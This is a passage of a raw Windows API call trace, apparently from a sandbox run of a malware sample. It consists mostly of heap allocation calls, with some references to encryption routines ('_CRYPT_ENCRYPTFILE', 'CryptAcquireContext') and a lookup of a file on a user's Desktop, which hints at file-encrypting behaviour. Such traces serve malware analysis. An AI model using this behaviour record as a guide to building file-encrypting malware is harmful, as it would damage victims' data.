lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392228 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369cc0 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0120.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0120.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0120.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0120.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0120.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0120.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0120.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0120.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0120.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0120.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea040 [0120.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0120.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0120.276] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0120.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0120.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0120.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0120.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0120.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0120.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0120.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0120.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0120.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0120.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0120.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0120.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0120.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0120.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0120.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0120.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0120.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0120.277] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0120.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0120.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0120.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0120.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0120.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0120.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0120.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0120.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0120.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0120.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0120.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0120.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d70 [0120.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9d70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0120.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0120.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0120.278] CloseHandle (hObject=0x2a0) returned 1 [0120.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0120.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea490 [0120.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0120.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0120.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0120.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0120.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0120.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0120.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0120.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0120.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0120.278] FreeLibrary (hLibModule=0x772d0000) returned 1 [0120.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0120.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0120.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0120.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0120.278] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0120.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0120.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920d8 [0120.279] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0120.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0120.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22c0 [0120.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0120.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0120.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0120.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0120.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22f0 [0120.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0120.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0120.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0120.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0120.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0120.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0120.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0120.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0120.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2180 [0120.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0120.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0120.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0120.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2220 [0120.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0120.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0120.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c80 [0120.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0120.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0120.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0120.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0120.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0120.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0120.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0120.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0120.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0120.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923b0 [0120.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0120.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0120.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0120.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0120.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0120.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0120.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0120.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0120.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0120.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0120.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0120.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0120.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0120.280] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0120.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0120.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0120.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0120.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0120.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0120.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0120.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0120.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0120.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0120.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0120.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0120.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0120.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0120.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0120.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0120.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0120.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0120.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0120.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0120.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0120.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0120.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0120.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0120.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0120.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0120.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0120.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0120.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0120.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0120.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0120.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0120.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0120.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0120.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0120.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0120.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0120.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0120.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0120.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0120.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0120.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0120.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0120.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0120.282] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\AQwif8E74Z.avi", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x864003a0, ftCreationTime.dwHighDateTime=0x1d5e0f1, ftLastAccessTime.dwLowDateTime=0xecc04980, ftLastAccessTime.dwHighDateTime=0x1d5e6ed, ftLastWriteTime.dwLowDateTime=0xecc04980, ftLastWriteTime.dwHighDateTime=0x1d5e6ed, nFileSizeHigh=0x0, nFileSizeLow=0x17a26, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="AQwif8E74Z.avi", cAlternateFileName="AQWIF8~1.AVI")) returned 0x41ac540 [0120.282] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0120.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0120.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0120.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0120.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0120.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0120.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0120.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0120.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0120.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0120.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0120.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0120.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0120.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0120.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0120.283] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0120.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6a0 [0120.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0120.283] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0120.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0120.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0120.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0120.283] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0120.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca598 [0120.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0120.283] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0120.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0120.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0120.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0120.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0120.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0120.284] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0120.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0120.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0120.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0120.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0120.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0120.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0120.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0120.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0120.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0120.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0120.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0120.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0120.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0120.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0120.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0120.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0120.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392490 [0120.284] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0120.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0120.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2560 [0120.285] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.285] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0120.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0120.285] WideCharToMultiByte (in: 